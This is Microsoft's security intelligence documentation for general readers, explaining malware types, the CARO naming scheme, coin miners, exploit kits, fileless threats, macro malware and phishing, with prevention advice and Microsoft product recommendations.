Document

Contents
Security intelligence
Understand malware & other threats
Prevent malware infection
Malware names
Coin miners
Exploits and exploit kits
Fileless threats
Macro malware
Phishing
Ransomware
Rootkits
Supply chain attacks
Tech support scams
Trojans
Unwanted software
Worms
How Microsoft identifies malware and PUA
Submit files for analysis
Safety Scanner download
Industry tests
Industry collaboration programs
Virus information alliance
Microsoft virus initiative
Coordinated malware eradication
Information for developers
Software developer FAQ
Software developer resources
Security intelligence
4/5/2019 • 2 minutes to read • Edit Online
Here you will find information about different types of malware, safety tips on how you can protect your
organization, and resources for industry collaboration programs
Understand malware & other threats
How Microsoft identifies malware and PUA
Safety Scanner download
Keep up with the latest malware news and research. Check out our Windows security blogs and follow us on
Twitter for the latest news, discoveries, and protections.
Learn more about Windows security.
Understanding malware & other threats
Malware is a term used to describe malicious applications and code that can cause damage and disrupt normal use
of devices. Malware can allow unauthorized access, use system resources, steal passwords, lock you out of your
computer and ask for ransom, and more.
Cybercriminals that distribute malware are often motivated by money and will use infected computers to launch
attacks, obtain banking credentials, collect information that can be sold, sell access to computing resources, or
extort payment from victims.
As criminals become more sophisticated with their attacks, Microsoft is here to help. Windows 10 is the most
secure version of Windows yet and includes many features to help protect you whether you're at home, at work, or
on the go. With Windows Defender Advanced Threat Protection (Windows Defender ATP ), businesses can stay
protected with next-generation protection and other security capabilities.
For good general tips, check out the prevent malware infection topic.
There are many types of malware, including:
Coin miners
Macro malware
Phishing
Ransomware
Rootkits
Tech support scams
Trojans
Unwanted software
Worms
Keep up with the latest malware news and research. Check out our Windows security blogs and follow us on
Twitter for the latest news, discoveries, and protections.
Learn more about Windows security.
Prevent malware infection
Malware authors are always looking for new ways to infect computers. Follow the simple tips below to stay
protected and minimize threats to your data and accounts.
Keep software up-to-date

Exploits typically use vulnerabilities in popular software such as web browsers, Java, Adobe Flash Player, and
Microsoft Office to infect devices. Software updates patch vulnerabilities so they aren't available to exploits
anymore.
To keep Microsoft software up to date, ensure that automatic Microsoft Updates are enabled. Also, upgrade to the
latest version of Windows to benefit from a host of built-in security enhancements.
Be wary of links and attachments

Email and other messaging tools are a few of the most common ways your device can get infected. Attachments
or links in messages can open malware directly or can stealthily trigger a download. Some emails will give
instructions to allow macros or other executable content designed to make it easier for malware to infect your
devices.
Use an email service that provides protection against malicious attachments, links, and abusive senders.
Microsoft Office 365 has built-in antimalware, link protection, and spam filtering.
For more information, see phishing.
Watch out for malicious or compromised websites

By visiting malicious or compromised sites, your device can get infected with malware automatically or you can
get tricked into downloading and installing malware. See exploits and exploit kits as an example of how some of
these sites can automatically install malware to visiting computers.
To identify potentially harmful websites, keep the following in mind:
The initial part (domain) of a website address should represent the company that owns the site you are
visiting. Check the domain for misspellings. For example, malicious sites commonly use domain names
that swap the letter O with a zero (0) or the letters L and I with a one (1). If example.com is spelled
examp1e.com, the site you are visiting is suspect.
Sites that aggressively open popups and display misleading buttons often trick users into accepting
content through constant popups or mislabeled buttons.
To block malicious websites, use a modern web browser like Microsoft Edge which identifies phishing and
malware websites and checks downloads for malware.
If you encounter an unsafe site, click More [… ] > Send feedback on Microsoft Edge. You can also report unsafe
sites directly to Microsoft.
Pirated material on compromised websites
Using pirated content is not only illegal, it can also expose your device to malware. Sites that offer pirated
software and media are also often used to distribute malware when the site is visited. Sometimes pirated
software is bundled with malware and other unwanted software when downloaded, including intrusive browser
plugins and adware.
Users do not openly discuss visits to these sites, so any untoward experience are more likely to stay unreported.
To stay safe, download movies, music, and apps from official publisher websites or stores. Consider running a
streamlined OS such as Windows 10 Pro SKU S Mode, which ensures that only vetted apps from the Windows
Store are installed.
Don't attach unfamiliar removable drives

Some types of malware can spread by copying themselves to USB flash drives or other removable drives. There
are malicious individuals that intentionally prepare and distribute infected drives—leaving these drives in public
places to victimize unsuspecting individuals.
Only use removable drives that you are familiar with or that come from a trusted source. If a drive has been used
in publicly accessible devices, like computers in a café or a library, make sure you have antimalware running on
your computer before you use the drive. Avoid opening unfamiliar files you find on suspect drives, including
Office and PDF documents and executable files.
Use a non-administrator account

At the time they are launched, whether inadvertently by a user or automatically, most malware run under the
same privileges as the active user. This means that by limiting account privileges, you can prevent malware from
making consequential changes any devices.
By default, Windows uses User Account Control (UAC ) to provide automatic, granular control of privileges—it
temporarily restricts privileges and prompts the active user every time an application attempts to make
potentially consequential changes to the system. Although UAC helps limit the privileges of admin users, users
can simply override this restriction when prompted. As a result, it is quite easy for an admin user to inadvertently
allow malware to run.
To help ensure that everyday activities do not result in malware infection and other potentially catastrophic
changes, it is recommended that you use a non-administrator account for regular use. By using a non-
administrator account, you can prevent installation of unauthorized apps and prevent inadvertent changes to
system settings. Avoid browsing the web or checking email using an account with administrator privileges.
Whenever necessary, log in as an administrator to install apps or make configuration changes that require admin
privileges.
Read about creating user accounts and giving administrator privileges
Other safety tips

To further ensure that data is protected from malware as well as other threats:
Backup files. Follow the 3-2-1 rule: make 3 copies, store in at least 2 locations, with at least 1 offline
copy. Use OneDrive for reliable cloud-based copies that allows access to files from multiple devices and
helps recover damaged or lost files, including files locked by ransomware.
Be wary when connecting to public hotspots, particularly those that do not require authentication.
Use strong passwords and enable multi-factor authentication.
Do not use untrusted devices to log on to email, social media, and corporate accounts.
Software solutions
Microsoft provides comprehensive security capabilities that help protect against threats. We recommend:
Automatic Microsoft updates keeps software up-to-date to get the latest protections.
Controlled folder access stops ransomware in its tracks by preventing unauthorized access to your
important files. Controlled folder access locks down folders, allowing only authorized apps to access files.
Unauthorized apps, including ransomware and other malicious executable files, DLLs, and scripts are
denied access.
Microsoft Edge browser protects against threats such as ransomware by preventing exploit kits from
running. By using Microsoft SmartScreen, Microsoft Edge blocks access to malicious websites.
Microsoft Exchange Online Protection (EOP ) offers enterprise-class reliability and protection against spam
and malware, while maintaining access to email during and after emergencies.
Microsoft Safety Scanner helps remove malicious software from computers. NOTE: This tool does not
replace your antimalware product.
Microsoft 365 includes Office 365, Windows 10, and Enterprise Mobility + Security. These resources
power productivity while providing intelligent security across users, devices, and data.
Office 365 Advanced Threat Protection includes machine learning capabilities that block dangerous
emails, including millions of emails carrying ransomware downloaders.
OneDrive for Business can back up files, which you would then use to restore files in the event of an
infection.
Windows Defender Advanced Threat Protection provides comprehensive endpoint protection, detection,
and response capabilities to help prevent ransomware. In the event of a breach, Windows Defender ATP
alerts security operations teams about suspicious activities and automatically attempts to resolve the
problem. This includes alerts for suspicious PowerShell commands, connecting to a TOR website,
launching self-replicated copies, and deletion of volume shadow copies. Try Windows Defender ATP free
of charge.
Windows Hello for Business replaces passwords with strong two-factor authentication on your devices.
This authentication consists of a new type of user credential that is tied to a device and uses a biometric or
PIN. It lets user authenticate to an Active Directory or Azure Active Directory account.
Earlier than Windows 10 (not recommended)
Microsoft Security Essentials provides real-time protection for your home or small business device that
guards against viruses, spyware, and other malicious software.
What to do with a malware infection

Windows Defender ATP antivirus capabilities helps reduce the chances of infection and will automatically remove
threats that it detects.
In case threat removal is unsuccessful, read about troubleshooting malware detection and removal problems.
Malware names
We name the malware and unwanted software that we detect according to the Computer Antivirus Research
Organization (CARO ) malware naming scheme. The scheme uses the following format:
When our analysts research a particular threat, they will determine what each of the components of the name will
be.
Type
Describes what the malware does on your computer. Worms, viruses, trojans, backdoors, and ransomware are
some of the most common types of malware.
Adware
Backdoor
Behavior
BrowserModifier
Constructor
DDoS
Exploit
Hacktool
Joke
Misleading
MonitoringTool
Program
PWS
Ransom
RemoteAccess
Rogue
SettingsModifier
SoftwareBundler
Spammer
Spoofer
Spyware
Tool
Trojan
TrojanClicker
TrojanDownloader
TrojanNotifier
TrojanProxy
TrojanSpy
VirTool
Virus
Worm
Platforms
Indicates the operating system (such as Windows, Mac OS X, and Android) that the malware is designed to work
on. The platform is also used to indicate programming languages and file formats.
Operating systems
AndroidOS: Android operating system
DOS: MS -DOS platform
EPOC: Psion devices
FreeBSD: FreeBSD platform
iPhoneOS: iPhone operating system
Linux: Linux platform
MacOS: MAC 9.x platform or earlier
MacOS_X: MacOS X or later
OS2: OS2 platform
Palm: Palm operating system
Solaris: System V -based Unix platforms
SunOS: Unix platforms 4.1.3 or lower
SymbOS: Symbian operating system
Unix: general Unix platforms
Win16: Win16 (3.1) platform
Win2K: Windows 2000 platform
Win32: Windows 32-bit platform
Win64: Windows 64-bit platform
Win95: Windows 95, 98 and ME platforms
Win98: Windows 98 platform only
WinCE: Windows CE platform
WinNT: WinNT
Scripting languages
ABAP: Advanced Business Application Programming scripts
ALisp: ALisp scripts
AmiPro: AmiPro script
ANSI: American National Standards Institute scripts
AppleScript: compiled Apple scripts
ASP: Active Server Pages scripts
AutoIt: AutoIT scripts
BAS: Basic scripts
BAT: Basic scripts
CorelScript: Corelscript scripts
HTA: HTML Application scripts
HTML: HTML Application scripts
INF: Install scripts
IRC: mIRC/pIRC scripts
Java: Java binaries (classes)
JS: Javascript scripts
LOGO: LOGO scripts
MPB: MapBasic scripts
MSH: Monad shell scripts
MSIL: .Net intermediate language scripts
Perl: Perl scripts
PHP: Hypertext Preprocessor scripts
Python: Python scripts
SAP: SAP platform scripts
SH: Shell scripts
VBA: Visual Basic for Applications scripts
VBS: Visual Basic scripts
WinBAT: Winbatch scripts
WinHlp: Windows Help scripts
WinREG: Windows registry scripts
Macros
A97M: Access 97, 2000, XP, 2003, 2007, and 2010 macros
HE: macro scripting
O97M: Office 97, 2000, XP, 2003, 2007, and 2010 macros - those that affect Word, Excel, and Powerpoint
PP97M: PowerPoint 97, 2000, XP, 2003, 2007, and 2010 macros
V5M: Visio5 macros
W1M: Word1Macro
W2M: Word2Macro
W97M: Word 97, 2000, XP, 2003, 2007, and 2010 macros
WM: Word 95 macros
X97M: Excel 97, 2000, XP, 2003, 2007, and 2010 macros
XF: Excel formulas
XM: Excel 95 macros
Other file types
ASX: XML metafile of Windows Media .asf files
HC: HyperCard Apple scripts
MIME: MIME packets
Netware: Novell Netware files
QT: Quicktime files
SB: StarBasic (Staroffice XML ) files
SWF: Shockwave Flash files
TSQL: MS SQL server files
XML: XML files
Family
Grouping of malware based on common characteristics, including attribution to the same authors. Security
software providers sometimes use different names for the same malware family.
Variant letter
Used sequentially for every distinct version of a malware family. For example, the detection for the variant ".AF"
would have been created after the detection for the variant ".AE".
Suffixes
Provides extra detail about the malware, including how it is used as part of a multicomponent threat. In the
example above, "!lnk" indicates that the threat component is a shortcut file used by Trojan:Win32/Reveton.T.
.dam: damaged malware
.dll: Dynamic Link Library component of a malware
.dr: dropper component of a malware
.gen: malware that is detected using a generic signature
.kit: virus constructor
.ldr: loader component of a malware
.pak: compressed malware
.plugin: plug-in component
.remnants: remnants of a virus
.worm: worm component of that malware
!bit: an internal category used to refer to some threats
!cl: an internal category used to refer to some threats
!dha: an internal category used to refer to some threats
!pfn: an internal category used to refer to some threats
!plock: an internal category used to refer to some threats
!rfn: an internal category used to refer to some threats
!rootkit: rootkit component of that malware
@m: worm mailers
@mm: mass mailer worm
Coin miners
Cybercriminals are always looking for new ways to make money. With the rise of digital currencies, also known as
cryptocurrencies, criminals see a unique opportunity to infiltrate an organization and secretly mine for coins by
reconfiguring malware.
How coin miners work

Many infections start with:
Email messages with attachments that try to install malware.
Websites hosting exploit kits that attempt to use vulnerabilities in web browsers and other software to
install coin miners.
Websites taking advantage of computer processing power by running scripts while users browse the
website.
Mining is the process of running complex mathematical calculations necessary to maintain the blockchain ledger.
This process generates coins but requires significant computing resources.
Coin miners are not inherently malicious. Some individuals and organizations invest in hardware and electric
power for legitimate coin mining operations. However, others look for alternative sources of computing power and
try to find their way into corporate networks. These coin miners are not wanted in enterprise environments
because they eat up precious computing resources.
Cybercriminals see an opportunity to make money by running malware campaigns that distribute, install, and run
trojanized miners at the expense of other people’s computing resources.
Examples
DDE exploits, which have been known to distribute ransomware, are now delivering miners.
For example, a sample of the malware detected as Trojan:Win32/Coinminer (SHA-256:
7213cbbb1a634d780f9bb861418eb262f58954e6e5dca09ca50c1e1324451293) is installed by
Exploit:O97M/DDEDownloader.PA, a Word document that contains the DDE exploit.
The exploit launches a cmdlet that executes a malicious PowerShell script (Trojan:PowerShell/Maponeir.A), which
then downloads the trojanized miner: a modified version of the miner XMRig, which mines Monero
cryptocurrency.
How to protect against coin miners

Enable PUA detection: Some coin mining tools are not considered malware but are detected as potentially
unwanted applications (PUA). Many applications detected as PUA can negatively impact machine performance and
employee productivity. In enterprise environments, you can stop adware, torrent downloaders, and coin mining by
enabling PUA detection.
Since coin miners is becoming a popular payload in many different kinds of attacks, see general tips on how to
prevent malware infection.
For more information on coin miners, see the blog post Invisible resource thieves: The increasing threat of
cryptocurrency miners.
Exploits take advantage of vulnerabilities in software. A vulnerability is like a hole in your software that malware
can use to get onto your device. Malware exploits these vulnerabilities to bypass your computer's security
safeguards to infect your device.
How exploits and exploit kits work

Exploits are often the first part of a larger attack. Hackers scan for outdated systems that contain critical
vulnerabilities, which they then exploit by deploying targeted malware. Exploits often include what's called
"shellcode". This is a small malware payload that's used to download additional malware from attacker-controlled
networks. This allows hackers to infect devices and infiltrate organizations.
Exploit kits are more comprehensive tools that contain a collection of exploits. These kits scan devices for different
kinds of software vulnerabilities and, if any are detected, deploys additional malware to further infect a device. Kits
can use exploits targeting a variety of software, including Adobe Flash Player, Adobe Reader, Internet Explorer,
Oracle Java and Sun Java.
The most common method used by attackers to distribute exploits and exploit kits is through webpages, but
exploits can also arrive in emails. Some websites unknowingly and unwillingly host malicious code and exploits in
their ads.
The infographic below shows how an exploit kit might attempt to exploit a device when a compromised webpage
is visited.
Figure 1. Example of how exploit kits work

Several notable threats, including Wannacry, exploit the Server Message Block (SMB ) vulnerability CVE -2017-
0144 to launch malware.
Examples of exploit kits:
Angler / Axpergle
Neutrino
Nuclear
To learn more about exploits, read this blog post on taking apart a double zero-day sample discovered in joint
hunt with ESET.
How we name exploits

We categorize exploits in our Malware encyclopedia by the "platform" they target. For example, Exploit:Java/CVE -
2013-1489.A is an exploit that targets a vulnerability in Java.
A project called "Common Vulnerabilities and Exposures (CVE )" is used by many security software vendors. The
project gives each vulnerability a unique number, for example, CVE -2016-0778. The portion "2016" refers to the
year the vulnerability was discovered. The "0778" is a unique ID for this specific vulnerability.
You can read more on the CVE website.
How to protect against exploits

The best prevention for exploits is to keep your organization's software up to date. Software vendors provide
updates for many known vulnerabilities and making sure these updates are applied to all devices is an important
step to prevent malware.
For more general tips, see prevent malware infection.
Fileless threats
What exactly is a fileless threat? The term "fileless" suggests that a threat that does not come in a file, such as a
backdoor that lives only in the memory of a machine. However, there's no generally accepted definition. The terms
is used broadly; it's also used to describe malware families that do rely on files in order to operate.
Given that attacks involve several stages for functionalities like execution, persistence, information theft, lateral
movement, communication with command-and-control, etc., some parts of the attack chain may be fileless, while
others may involve the filesystem in some form or another.
To shed light on this loaded term, we grouped fileless threats into different categories.
Figure 1. Comprehensive diagram of fileless malware

We can classify fileless threats by their entry point, which indicates how fileless malware can arrive on a machine:
via an exploit; through compromised hardware; or via regular execution of applications and scripts.
Next, we can list the form of entry point: for example, exploits can be based on files or network data; PCI
peripherals are a type of hardware vector; and scripts and executables are sub-categories of the execution vector.
Finally, we can classify the host of the infection: for example, a Flash application that may contain an exploit; a
simple executable; a malicious firmware from a hardware device; or an infected MBR, which could bootstrap the
execution of a malware before the operating system even loads.
This helps us divide and categorize the various kinds of fileless threats. Clearly, the categories are not all the same:
some are more dangerous but also more difficult to implement, while others are more commonly used despite (or
precisely because of) not being very advanced.
From this categorization, we can glean three big types of fileless threats based on how much fingerprint they may
leave on infected machines.
Type I: No file activity performed

A completely fileless malware can be considered one that never requires writing a file on the disk. How would such
malware infect a machine in the first place? An example scenario could be a target machine receiving malicious
network packets that exploit the EternalBlue vulnerability, leading to the installation of the DoublePulsar backdoor,
which ends up residing only in the kernel memory. In this case, there is no file or any data written on a file.
Another scenario could involve compromised devices, where malicious code could be hiding in device firmware
(such as a BIOS ), a USB peripheral (like the BadUSB attack), or even in the firmware of a network card. All these
examples do not require a file on the disk in order to run and can theoretically live only in memory, surviving even
reboots, disk reformats, and OS reinstalls.
Infections of this type can be extra difficult to detect and remediate. Antivirus products usually don’t have the
capability to access firmware for inspection; even if they did, it would be extremely challenging to detect and
remediate threats at this level. Because this type of fileless malware requires high levels of sophistication and often
depend on particular hardware or software configuration, it’s not an attack vector that can be exploited easily and
reliably. For this reason, while extremely dangerous, threats of this type tend to be very uncommon and not
practical for most attacks.
Type II: Indirect file activity

There are other ways that malware can achieve fileless presence on a machine without requiring significant
engineering effort. Fileless malware of this type don’t directly write files on the file system, but they can end up
using files indirectly. This is the case for Poshspy backdoor. Attackers installed a malicious PowerShell command
within the WMI repository and configured a WMI filter to run such command periodically.
It’s possible to carry out such installation via command line without requiring the presence of the backdoor to be
on a file in the first place. The malware can thus be installed and theoretically run without ever touching the file
system. However, the WMI repository is stored on a physical file that is a central storage area managed by the CIM
Object Manager and usually contains legitimate data. Therefore, while the infection chain does technically use a
physical file, for practical purposes it’s considered a fileless attack given that the WMI repository is a multi-purpose
data container that cannot be simply detected and removed.
Type III: Files required to operate

Some malware can have some sort of fileless persistence but not without using files in order to operate. An
example for this scenario is Kovter, which creates a shell open verb handler in the registry for a random file
extension. This action means that opening a file with such extension will lead to the execution of a script through
the legitimate tool mshta.exe.
Figure 2. Kovter’s registry key
When the open verb is invoked, the associated command from the registry is launched, which results in the
execution of a small script. This script reads data from a further registry key and executes it, in turn leading to the
loading of the final payload. However, to trigger the open verb in the first place, Kovter has to drop a file with the
same extension targeted by the verb (in the example above, the extension is .bbf5590fd). It also has to set an auto-
run key configured to open such file when the machine starts.
Despite the use of files, and despite the fact that the registry too is stored in physical files, Kovter is considered a
fileless threat because the file system is of no practical use: the files with random extension contain junk data that is
not usable in verifying the presence of the threat, and the files that store the registry are containers that cannot be
detected and deleted if malicious content is present.
Categorizing fileless threats by infection host

Having described the broad categories, we can now dig into the details and provide a breakdown of the infection
hosts. This comprehensive classification covers the panorama of what is usually referred to as fileless malware. It
drives our efforts to research and develop new protection features that neutralize classes of attacks and ensure
malware does not get the upper hand in the arms race.
Exploits
File-based (Type III: executable, Flash, Java, documents): An initial file may exploit the operating system, the
browser, the Java engine, the Flash engine, etc. in order to execute a shellcode and deliver a payload in memory.
While the payload is fileless, the initial entry vector is a file.
Network-based (Type I): A network communication that takes advantage of a vulnerability in the target machine
can achieve code execution in the context of an application or the kernel. An example is WannaCry, which exploits a
previously fixed vulnerability in the SMB protocol to deliver a backdoor within the kernel memory.
Hardware
Device-based (Type I: network card, hard disk): Devices like hard disks and network cards require chipsets and
dedicated software to function. A software residing and running in the chipset of a device is called a firmware.
Although a complex task, the firmware can be infected by malware, as the Equation espionage group has been
caught doing.
CPU -based (Type I): Modern CPUs are extremely complex and may include subsystems running firmware for
management purposes. Such firmware may be vulnerable to hijacking and allow the execution of malicious code
that would hence operate from within the CPU. In December 2017, two researchers reported a vulnerability that
can allow attackers to execute code inside the Management Engine (ME ) present in any modern CPU from Intel.
Meanwhile, the attacker group PLATINUM has been observed to have the capability to use Intel's Active
Management Technology (AMT) to perform invisible network communications bypassing the installed operating
system. ME and AMT are essentially autonomous micro-computers that live inside the CPU and that operate at a
very low level. Because these technologies’ purpose is to provide remote manageability, they have direct access to
hardware, are independent of the operating system, and can run even if the computer is turned off. Besides being
vulnerable at the firmware level, CPUs could be manufactured with backdoors inserted directly in the hardware
circuitry. This attack has been researched and proved possible in the past. Just recently it has been reported that
certain models of x86 processors contain a secondary embedded RISC -like CPU core that can effectively provide a
backdoor through which regular applications can gain privileged execution.
USB -based (Type I): USB devices of all kinds can be reprogrammed with a malicious firmware capable of
interacting with the operating system in nefarious ways. This is the case of the BadUSB technique, demonstrated
few years ago, which allows a reprogrammed USB stick to act as a keyboard that sends commands to machines via
keystrokes, or as a network card that can redirect traffic at will.
BIOS -based (Type I): A BIOS is a firmware running inside a chipset. It executes when a machine is powered on,
initializes the hardware, and then transfers control to the boot sector. It’s a very important component that operates
at a very low level and executes before the boot sector. It’s possible to reprogram the BIOS firmware with
malicious code, as has happened in the past with the Mebromi rootkit.
Hypervisor-based (Type I): Modern CPUs provide hardware hypervisor support, allowing the operating system to
create robust virtual machines. A virtual machine runs in a confined, simulated environment, and is in theory
unaware of the emulation. A malware taking over a machine may implement a small hypervisor in order to hide
itself outside of the realm of the running operating system. Malware of this kind has been theorized in the past, and
eventually real hypervisor rootkits have been observed, although very few are known to date.
Execution and injection
File-based (Type III: executables, DLLs, LNK files, scheduled tasks): This is the standard execution vector. A simple
executable can be launched as a first-stage malware to run an additional payload in memory or inject it into other
legitimate running processes.
Macro-based (Type III: Office documents): The VBA language is a flexible and powerful tool designed to automate
editing tasks and add dynamic functionality to documents. As such, it can be abused by attackers to carry out
malicious operations like decoding, running, or injecting an executable payload, or even implementing an entire
ransomware, like in the case of qkG. Macros are executed within the context of an Office process (e.g.,
Winword.exe), and they’re implemented in a scripting language, so there is no binary executable that an antivirus
can inspect. While Office apps require explicit consent from the user to execute macros from a document, attackers
use social engineering techniques to trick users into allowing macros to execute.
Script-based (Type II: file, service, registry, WMI repo, shell): The JavaScript, VBScript, and PowerShell scripting
languages are available by default on Windows platforms. Scripts have the same advantages as macros: they’re
textual files (not binary executables) and they run within the context of the interpreter (e.g., wscript.exe,
powershell.exe, etc.), which is a clean and legitimate component. Scripts are very versatile; they can be run from a
file (e.g., by double-clicking them) or, in some cases, executed directly on the command line of an interpreter. Being
able to run on the command line can allow malware to encode malicious command-line scripts as auto-start
services inside autorun registry keys as WMI event subscriptions from the WMI repo. Furthermore, an attacker
who has gained access to an infected machine may input the script on the command prompt.
Disk-based (Type II: Boot Record): The Boot Record is the first sector of a disk or volume and contains executable
code required to start the boot process of the operating system. Threats like Petya are capable of infecting the Boot
Record by overwriting it with malicious code, so that when the machine is booted the malware immediately gains
control (and in the case of Petya, with disastrous consequences). The Boot Record resides outside the file system,
but it’s accessible by the operating system, and modern antivirus products have the capability to scan and restore it.
Defeating fileless malware

At Microsoft, we actively monitor the security landscape to identify new threat trends and develop solutions that
continuously enhance Windows security and mitigate classes of threats. We instrument durable protections that
are effective against a wide range of threats. Through AntiMalware Scan Interface (AMSI), behavior monitoring,
memory scanning, and boot sector protection, Windows Defender Advanced Threat Protection (Windows
Defender ATP ) can inspect fileless threats even with heavy obfuscation. Machine learning technologies in the cloud
allow us to scale these protections against new and emerging threats.
To learn more, read: Out of sight but not invisible: Defeating fileless malware with behavior monitoring, AMSI, and
next-gen AV
Macro malware
Macros are a powerful way to automate common tasks in Microsoft Office and can make people more productive.
However, macro malware uses this functionality to infect your device.
How macro malware works

Macro malware hides in Microsoft Office files and are delivered as email attachments or inside ZIP files. These files
use names that are intended to entice or scare people into opening them. They often look like invoices, receipts,
legal documents, and more.
Macro malware was fairly common several years ago because macros ran automatically whenever a document
was opened. However, in recent versions of Microsoft Office, macros are disabled by default. This means malware
authors need to convince users to turn on macros so that their malware can run. They do this by showing fake
warnings when a malicious document is opened.
We've seen macro malware download threats from the following families:
Ransom:MSIL/Swappa
Ransom:Win32/Teerac
TrojanDownloader:Win32/Chanitor
TrojanSpy:Win32/Ursnif
Win32/Fynloski
Worm:Win32/Gamarue
How to protect against macro malware

Make sure macros are disabled in your Microsoft Office applications. In enterprises, IT admins set the
default setting for macros:
Enable or disable macros in Office documents
Don’t open suspicious emails or suspicious attachments.
Delete any emails from unknown people or with suspicious content. Spam emails are the main way macro
malware spreads.
Enterprises can prevent macro malware from running executable content using ASR rules
Phishing
Phishing attacks attempt to steal sensitive information through emails, websites, text messages, or other forms of
electronic communication that often look to be official communication from legitimate companies or individuals.
The information that phishers (as the cybercriminals behind phishing attacks are called) attempt to steal can be
user names and passwords, credit card details, bank account information, or other credentials. Attackers can then
use stolen information for malicious purposes, such as hacking, identity theft, or stealing money directly from bank
accounts and credit cards. Phishers can also sell the information in cybercriminal underground marketplaces.
How phishing works

Phishing attacks are scams that often use social engineering bait or lure content. For example, during tax season,
bait content involves tax-filing announcements that attempt to lure you into providing your personal information
such as your Social Security number or bank account information.
Legitimate-looking communication, usually email, that links to a phishing site is one of the most common methods
used in phishing attacks. The phishing site typically mimics sign-in pages that require users to input login
credentials and account information. The phishing site then captures the sensitive information as soon as the user
provides it, giving attackers access to the information.
Another common phishing technique is the use of emails that direct you to open a malicious attachment, for
example a PDF file. The attachment often contains a message asking you to provide login credentials to another
site such as email or file sharing websites to open the document. When you access these phishing sites using your
login credentials, the attacker now has access to your information and can gain additional personal information
about you.
Phishing trends and techniques

Invoice phishing
In this scam, the attacker attempts to lure you with an email stating that you have an outstanding invoice from a
known vendor or company and provides a link for you to access and pay your invoice. When you access the site,
the attacker is poised to steal your personal information and funds.
Payment/delivery scam
You are asked to provide a credit card or other personal information so that your payment information can be
updated with a commonly known vendor or supplier. The update is requested so that you can take delivery of your
ordered goods. Generally, you may be familiar with the company and have likely done business with them in the
past, but you are not aware of any items you have recently purchased from them.
Tax-themed phishing scams
A common IRS phishing scams is one in which an urgent email letter is sent indicating that you owe money to the
IRS. Often the email threatens legal action if you do not access the site in a timely manner and pay your taxes.
When you access the site, the attackers can steal your personal credit card or bank information and drain your
accounts.
Downloads
Another frequently-used phishing scam is one in which an attacker sends a fraudulent email requesting you to
open or download a document, often one requiring you to sign in.
Phishing emails that deliver other threats
Phishing emails can be very effective, and so attackers can using them to distribute ransomware through links or
attachments in emails. When run, the ransomware encrypts files and displays a ransom note, which asks you to
pay a sum of money to access to your files.
We have also seen phishing emails that have links to tech support scam websites, which use various scare tactics
to trick you into calling hotlines and paying for unnecessary "technical support services" that supposedly fix
contrived device, platform, or software problems.
Targeted attacks against enterprises

Spear phishing
Spear phishing is a targeted phishing attack that involves highly customized lure content. To perform spear
phishing, attackers will typically do reconnaissance work, surveying social media and other information sources
about their intended target.
Spear phishing may involve tricking you into logging into fake sites and divulging credentials. Spear phishing may
also be designed to lure you into opening documents by clicking on links that automatically install malware. With
this malware in place, attackers can remotely manipulate the infected computer.
The implanted malware serves as the point of entry for a more sophisticated attack known as an advanced
persistent threat (APT). APTs are generally designed to establish control and steal data over extended periods. As
part of the attack, attackers often try to deploy more covert hacking tools, move laterally to other computers,
compromise or create privileged accounts, and regularly exfiltrate information from compromised networks.
Whaling
Whaling is a form of phishing in which the attack is directed at high-level or senior executives within specific
companies with the direct goal of gaining access to their credentials and/or bank information. The content of the
email may be written as a legal subpoena, customer complaint, or other executive issue. This type of attack can
also lead to an APT attack within an organization. When the links or attachment are opened, it can assist the
attacker in accessing credentials and other personal information, or launch a malware that will lead to an APT.
Business email compromise
Business email compromise (BEC ) is a sophisticated scam that targets businesses often working with foreign
suppliers and businesses that regularly perform wire transfer payments. One of the most common schemes used
by BEC attackers involves gaining access to a company’s network through a spear phishing attack, where the
attacker creates a domain similar to the company they are targeting or spoofs their email to scam users into
releasing personal account information for money transfers.
How to protect against phishing attacks

Social engineering attacks are designed to take advantage of a user's possible lapse in decision-making. Be aware
and never provide sensitive or personal information through email or unknown websites, or over the phone.
Remember, phishing emails are designed to appear legitimate.
Awareness
The best protection is awareness and education. Don’t open attachments or click links in unsolicited emails, even if
the emails came from a recognized source. If the email is unexpected, be wary about opening the attachment and
verify the URL.
Enterprises should educate and train their employees to be wary of any communication that requests personal or
financial information, and instruct them to report the threat to the company’s security operations team
immediately.
Here are several telltale signs of a phishing scam:
The links or URLs provided in emails are not pointing to the correct location or are attempting to have
you access a third-party site that is not affiliated with the sender of the email. For example, in the image
below the URL provided does not match the URL that you will be taken to.
There is a request for personal information such as social security numbers or bank or financial
information. Official communications won't generally request personal information from you in the form of
an email.
Items in the email address will be changed so that it is similar enough to a legitimate email address but
has added numbers or changed letters.
The message is unexpected and unsolicited. If you suddenly receive an email from an entity or a person
you rarely deal with, consider this email suspect.
The message or the attachment asks you to enable macros, adjust security settings, or install
applications. Normal emails will not ask you to do this.
The message contains errors. Legitimate corporate messages are less likely to have typographic or
grammatical errors or contain wrong information.
The sender address does not match the signature on the message itself. For example, an email is
purported to be from Mary of Contoso Corp, but the sender address is [email protected].
There are multiple recipients in the “To” field and they appear to be random addresses. Corporate
messages are normally sent directly to individual recipients.
The greeting on the message itself does not personally address you. Apart from messages that
mistakenly address a different person, those that misuse your name or pull your name directly from your
email address tend to be malicious.
The website looks familiar but there are inconsistencies or things that are not quite right such as
outdated logos, typos, or ask users to give additional information that is not asked by legitimate sign-in
websites.
The page that opens is not a live page but rather an image that is designed to look like the site you are
familiar with. A pop-up may appear that requests credentials.
If in doubt, contact the business by known channels to verify if any suspicious emails are in fact legitimate.
For more information, download and read this Microsoft e-book on preventing social engineering attacks,
especially in enterprise environments.
Software solutions for organizations
Microsoft Edge and Windows Defender Application Guard offer protection from the increasing threat of
targeted attacks using Microsoft's industry leading Hyper-V virtualization technology. If a browsed website
is deemed untrusted, the Hyper-V container will isolate that device from the rest of your network thereby
preventing access to your enterprise data.
Microsoft Exchange Online Protection (EOP ) offers enterprise-class reliability and protection against spam
and malware, while maintaining access to email during and after emergencies. Using various layers of
filtering, EOP can provide different controls for spam filtering, such as bulk mail controls and international
spam, that will further enhance your protection services.
Use Office 365 Advanced Threat Protection (ATP ) to help protect your email, files, and online storage
against malware. It offers holistic protection in Microsoft Teams, Word, Excel, PowerPoint, Visio, SharePoint
Online, and OneDrive for Business. By protecting against unsafe attachments and expanding protection
against malicious links, it complements the security features of Exchange Online Protection to provide
better zero-day protection.
For more tips and software solutions, see prevent malware infection.
What do I do if I've already been a victim of a phishing scam?

If you feel that you have been a victim of a phishing attack, contact your IT Admin. You should also immediately
change all passwords associated with the accounts, and report any fraudulent activity to your bank, credit card
company, etc.
Reporting spam
Submit phishing scam emails to Microsoft by sending an email with the scam as an attachment to:
